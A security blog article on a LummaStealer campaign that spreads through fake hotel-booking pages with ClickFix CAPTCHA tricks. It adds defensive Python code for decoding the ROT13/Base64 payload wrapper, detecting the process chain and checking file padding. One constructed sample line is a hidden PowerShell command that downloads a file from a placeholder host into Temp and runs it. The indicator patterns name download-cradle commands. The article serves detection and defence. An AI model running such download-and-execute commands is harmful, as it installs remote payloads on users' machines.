With global travel on the rise, cyber criminals are taking advantage of eager travelers through fake booking sites, phishing scams, and fraudulent listings. The latest threat? A sophisticated campaign utilizing booking websites to spread LummaStealer malware, using deceptive CAPTCHA prompts to trick unsuspecting individuals.
A New Twist in the LummaStealer Playbook
In early 2025, cybersecurity analysts at G DATA uncovered a new campaign delivering LummaStealer through booking confirmation pages. Initially spotted on a travel itinerary for Palawan, Philippines, the attack quickly shifted to a hotel in Munich, Germany. This pattern indicates a widening global reach for LummaStealer, which has now adopted malvertising techniques to target victims through travel-related sites.
LummaStealer, first discovered in 2022, operates under a Malware-as-a-Service (MaaS) model. Previously, it spread via platforms like GitHub and Telegram, but now, it has infiltrated booking websites, exposing a vast audience to potential infection.
How the Attack Works
Stage 1: Fake Booking Confirmation & CAPTCHA Trick
Victims receive a booking confirmation link, often through phishing emails, leading to a fake travel website (e.g., hxxps://payment-confirmation.82736[.]store/pgg46). This page mimics legitimate booking sites, complete with a CAPTCHA verification step.
Unlike a standard CAPTCHA, this one instructs users to copy and paste a command into their Windows Run box. This technique, called ClickFix, is an emerging social engineering trick designed to convince users to execute malicious commands themselves.
Stage 2: Hidden PHP & PowerShell Execution
Upon investigating the page source, researchers found an obfuscated JavaScript script that loads a command from an external PHP script. That script uses ROT13 encoding to conceal a Base64-encoded PowerShell command, which is then copied into the victim's clipboard.
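The two wrapping layers described above (Base64 inside ROT13) are trivial to reverse, and peeling them is the first step an analyst takes when a ClickFix page is reported. The following is an added example, not code from G DATA or from the campaign: the strings are constructed stand-ins (the real PowerShell command is not reproduced), the UTF-16LE-versus-UTF-8 guess is a heuristic because the article does not say which form was used, and the indicator names and patterns are this example's own choices.

```python
import base64
import codecs
import re

# Constructed stand-ins for the article's payload; the real command is not reproduced here.
SAMPLE_COMMAND = "Write-Host 'constructed sample, stands in for the real payload'"
SUSPICIOUS_SAMPLE = (
    r'powershell -W Hidden -c "Invoke-WebRequest hxxps://stage2.example.invalid/p '
    r'-OutFile $env:TEMP\stage2.exe; Start-Process $env:TEMP\stage2.exe"'
)

# Indicators an analyst would look for in a recovered ClickFix command
# (names and patterns are this example's own choices, not from the article).
INDICATORS = {
    "download cradle": r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient",
    "writes to Temp": r"\$env:TEMP|%TEMP%|\\Temp\\",
    "launches dropped file": r"Start-Process",
    "hidden window": r"-W(?:indowStyle)?\s+Hidden",
    "policy bypass": r"-(?:ExecutionPolicy|ep)\s+Bypass",
}


def wrap_rot13_base64(command: str, utf16: bool = True) -> str:
    """Apply the two layers the article describes (Base64, then ROT13) to a
    known string so the unwrapper can be exercised offline. UTF-16LE is the
    encoding PowerShell's -EncodedCommand expects; utf16=False produces UTF-8."""
    raw = command.encode("utf-16-le" if utf16 else "utf-8")
    b64 = base64.b64encode(raw).decode("ascii")
    return codecs.encode(b64, "rot_13")  # ROT13 leaves digits, '+', '/', '=' untouched


def unwrap_rot13_base64(blob: str) -> str:
    """Reverse ROT13, then Base64, then choose a text encoding. A buffer whose
    every odd byte is zero is treated as UTF-16LE (ASCII text encoded for
    -EncodedCommand); otherwise UTF-8 is assumed. This is a heuristic: the
    article does not say which form the campaign used."""
    b64 = codecs.decode(blob, "rot_13")
    raw = base64.b64decode(b64, validate=True)
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def triage(command: str) -> list[str]:
    """Return the sorted names of INDICATORS present in a recovered command."""
    return sorted(name for name, pat in INDICATORS.items()
                  if re.search(pat, command, re.IGNORECASE))


if __name__ == "__main__":
    blob = wrap_rot13_base64(SUSPICIOUS_SAMPLE)
    recovered = unwrap_rot13_base64(blob)
    print("recovered:", recovered)
    print("indicators:", triage(recovered))
```

Run against a blob lifted from a page's clipboard-setting script, the recovered text is what the victim would have pasted into the Run box; the indicator list is a quick triage aid, not a verdict, and a command that matches nothing still deserves a manual read.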
Stage 3: Payload Deployment
When pasted into the Windows Run command, the PowerShell script fetches a second-stage payload from a remote server. This file is stored in the Temp directory and executed via the Start-Process command, ultimately downloading and installing LummaStealer.
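The execution chain in Stages 1 to 3 leaves a distinctive process lineage: the Run box belongs to explorer.exe, so explorer.exe spawns PowerShell, which in turn starts a file written to the Temp directory. The following is an added example of correlating that lineage over process-creation telemetry; it is not code or data from G DATA, the event records are constructed, the field names are modelled loosely on Sysmon-style process-creation events, and the Temp-path and parent-name checks are this example's own heuristics.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (fields loosely modelled on Sysmon/EDR telemetry)."""
    pid: int
    ppid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent process


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry for this example: NOT real campaign data.
SAMPLE_EVENTS = [
    ProcEvent(1200, 800, r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Windows\winlogon.exe"),
    # Run box (explorer.exe) spawning PowerShell with a hidden window
    ProcEvent(4100, 1200, PS, 'powershell -W Hidden -c "<omitted in this constructed sample>"',
              r"C:\Windows\explorer.exe"),
    # Dropped second stage launched from the user's Temp directory
    ProcEvent(4188, 4100, r"C:\Users\alice\AppData\Local\Temp\stage2.exe",
              r"C:\Users\alice\AppData\Local\Temp\stage2.exe", PS),
    # Benign: an administrator opening PowerShell from a cmd.exe window
    ProcEvent(5200, 3300, PS, "powershell", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(5250, 5200, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all", PS),
]

SHELLS = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_temp(path: str) -> bool:
    p = path.lower()
    return "\\appdata\\local\\temp\\" in p or "\\windows\\temp\\" in p


def find_clickfix_chains(events: list[ProcEvent]) -> list[tuple[int, int]]:
    """Return (shell_pid, child_pid) pairs where a shell launched by explorer.exe
    (the Run box's parent) later starts a process from a Temp directory.
    explorer.exe also parents shells started from the Start menu or a shortcut,
    so this is a triage heuristic, not proof of compromise."""
    shells_from_explorer = {
        e.pid for e in events
        if _basename(e.image) in SHELLS and _basename(e.parent_image) == "explorer.exe"
    }
    return [(e.ppid, e.pid) for e in events
            if e.ppid in shells_from_explorer and _in_temp(e.image)]


if __name__ == "__main__":
    for shell_pid, child_pid in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"explorer.exe -> shell {shell_pid} -> Temp executable {child_pid}")
```

The benign cmd.exe-launched PowerShell in the sample is deliberately not flagged, because the parent is not explorer.exe. On a host where a hit is found, the text the user typed into the Run box is retained in the RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which corroborates the telemetry and recovers the pasted command for decoding.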
Stage 4: Evasion Techniques
LummaStealer’s latest variants have grown significantly in size (from 2MB to 9MB, a 350% increase). This expansion is likely due to binary padding, a tactic used to evade antivirus detection by adding junk data to inflate file size, making signature-based detection slower and less effective.
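Padding that is mostly a single repeated byte shows up as a long run of low-entropy chunks at the end of the file, which is cheap to check before a sample ever reaches a full scan. The following is an added example of that check, not code or a sample from G DATA: the "binary" is constructed from pseudo-random bytes followed by a block of zeros, and the thresholds are this example's own choices.

```python
import math
import random
from collections import Counter


def chunk_entropies(data: bytes, chunk: int = 4096) -> list[float]:
    """Shannon entropy (bits per byte, 0..8) of each consecutive chunk."""
    out = []
    for i in range(0, len(data), chunk):
        block = data[i:i + chunk]
        n = len(block)
        out.append(-sum(c / n * math.log2(c / n) for c in Counter(block).values()))
    return out


def trailing_constant_run(data: bytes) -> tuple[int, int]:
    """(byte value, length) of the run of identical bytes that ends the file."""
    if not data:
        return (0, 0)
    last = data[-1]
    return (last, len(data) - len(data.rstrip(bytes([last]))))


def padding_report(data: bytes, chunk: int = 4096, low: float = 1.0) -> dict:
    """Summarise how much of the file looks like constant-byte padding.
    'suspected_padding' requires both that most chunks are near-zero entropy
    and that a single trailing run covers more than half the file."""
    ents = chunk_entropies(data, chunk)
    low_frac = sum(e < low for e in ents) / len(ents) if ents else 0.0
    value, run = trailing_constant_run(data)
    return {
        "size": len(data),
        "low_entropy_fraction": low_frac,
        "trailing_pad_byte": value,
        "trailing_pad_bytes": run,
        "suspected_padding": low_frac > 0.5 and run > len(data) // 2,
    }


def build_sample(body_kib: int = 64, pad_kib: int = 256, seed: int = 7) -> bytes:
    """Constructed stand-in for a padded binary: a pseudo-random 'code' body
    followed by zero bytes. Not a real LummaStealer sample."""
    body = random.Random(seed).randbytes(body_kib * 1024)
    return body + b"\x00" * (pad_kib * 1024)


if __name__ == "__main__":
    print(padding_report(build_sample()))
```

The entropy test only catches padding made of repeated or otherwise low-variety bytes; junk drawn from a random source scores as high entropy as compressed code and would need a different check, such as comparing the PE's declared section sizes against the bytes actually on disk. The report is a prioritisation signal for analysts, and the padded and unpadded files should be expected to share very little beyond their leading bytes.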
Additionally, LummaStealer employs Indirect Control Flow obfuscation, dynamically calculating execution paths at runtime to make analysis harder. This mirrors techniques used by advanced malware families like Emotet, suggesting that LummaStealer’s operators are refining their tradecraft.
What was Found in the Wild
· Fake Travel Sites & PayPal Credential Theft
Further analysis of the campaign’s infrastructure revealed that the same server hosting the fake booking sites also housed phishing domains designed to steal PayPal credentials. This suggests that cybercriminals are running multiple scams simultaneously, preying on users who book trips and make online payments.
· Expanding Network of Fake Domains
Using telemetry data from VirusTotal, researchers identified multiple subdomains exhibiting the same behavior as the original attack. These domains used identical ClickFix tactics, reinforcing the idea that this is a coordinated campaign designed to ensnare as many victims as possible.
Looking Ahead: The Growing Threat of LummaStealer
LummaStealer’s aggressive expansion and adoption of new social engineering tactics indicate that it’s not slowing down. With a playbook reminiscent of the infamous Emotet banking trojan, it’s becoming a persistent and evolving threat.
Protecting Yourself from Travel-Related Cyber Threats
- Verify Booking Sites – Always book directly through trusted sources and be cautious of unsolicited emails offering travel deals.
- Check URLs Carefully – Phishing sites often use URLs that look like legitimate ones. Watch for subtle misspellings or unusual domain names.
- Never Paste Commands from Unknown Sources – Legitimate services will never ask you to copy and run commands manually.
- Use Security Software – A reputable antivirus and anti-malware solution can help detect and block malicious scripts.
- Enable Multi-Factor Authentication (MFA) – Adding an extra layer of security to accounts reduces the impact of credential theft.